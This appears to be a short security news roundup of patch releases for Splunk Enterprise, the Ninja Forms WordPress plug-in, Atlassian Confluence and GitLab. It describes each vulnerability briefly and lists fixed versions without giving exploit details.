Splunk has released some out-of-band patches for its Enterprise product, fixing issues including a critical-rated vulnerability that could lead to arbitrary code execution.

Labeled CVE-2022-32158, the flaw could allow an adversary to compromise a Universal Forwarder endpoint and execute code on other endpoints connected to the deployment server. Thankfully, there’s no indication that the vulnerability has been used in any real-world attacks.

Ninja Forms WordPress Plug-In

Ninja Forms, a WordPress plug-in with over a million active installations, has patched a serious issue that’s probably being used by attackers in the wild. “We uncovered a code injection vulnerability that made it possible for unauthenticated attackers to call a limited number of methods in various Ninja Forms classes, including a method that unserialized user-supplied content, resulting in Object Injection,” security analysts at the WordPress Wordfence Threat Intelligence team said in an update.

This could allow attackers to execute arbitrary code or delete arbitrary files on sites where a separate POP chain was present, researchers said.

The flaw has been fully patched in versions 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11. WordPress appears to have performed a forced automatic update for the plug-in, so your site may already be using one of the patched versions.

Atlassian

Australian software company Atlassian has released a patch to fix a zero-day flaw that’s already being exploited by attackers. Tracked as CVE-2022-26134, the RCE vulnerability in the Confluence Server and Data Center can be used to backdoor internet-exposed servers.

GitLab

GitLab has issued patches for versions 15.0.1, 14.10.4, and 14.9.5 for GitLab Community Edition and Enterprise Edition. The updates contain important security fixes for eight vulnerabilities, one of which could allow for account takeover.

With this in mind, the firm “strongly recommends” that all GitLab installations be upgraded to the latest version “as soon as possible.” GitLab.com is already running the patched version.

Tag

#intel